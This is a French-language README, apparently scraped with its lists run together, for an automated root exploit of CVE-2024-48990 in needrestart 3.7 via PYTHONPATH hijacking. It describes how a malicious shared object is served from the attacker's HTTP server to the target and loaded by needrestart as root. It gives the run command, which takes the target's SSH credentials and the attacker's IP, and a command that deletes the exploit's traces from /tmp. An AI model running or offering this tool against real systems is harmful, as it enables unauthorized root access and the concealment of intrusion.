
Exploit automatisé d'escalade de privilèges locaux pour CVE-2024-48990 (needrestart v3.7), exploitant le détournement de PYTHONPATH pour obtenir un accès root.
Cet outil automatise l'exploitation d'une vulnérabilité d'élévation de privilèges dans needrestart version 3.7, identifiée sous le nom CVE-2024-48990.
Il permet l'exécution en tant que root en exploitant l'utilisation non sécurisée de la variable d'environnement PYTHONPATH lorsque needrestart analyse les processus Python.
L'exploitation fonctionne comme suit :
__init__.so) déclenché lors de l'import..so via un serveur HTTP local.PYTHONPATH malveillant.importlib.needrestart, qui hérite du PYTHONPATH manipulé, charge le module malveillant et exécute la charge utile en tant que root./tmp/poc), permettant d'obtenir un shell root.Exécutez l'exploit depuis votre machine attaquante :
python3 exploit.py --user <ssh_user> --host <target_ip> --att-ip <attacker_ip> --ssh-pass <ssh_password>
Paramètres :
needrestart version 3.7Pour supprimer les traces de l'exploit sur la cible :
rm -rf /tmp/malicious /tmp/poc /tmp/exploit.sh
pexpect (pip3 install pexpect)gcc (pour compiler la charge utile)python3 -m http.server (démarré automatiquement par le script)needrestart (v3.7)sudo NOPASSWD pour /usr/sbin/needrestartcurl installésCet outil est fourni à des fins éducatives et de tests de sécurité autorisés uniquement. Ne l'utilisez pas sur des systèmes dont vous n'êtes pas propriétaire ou sans autorisation explicite.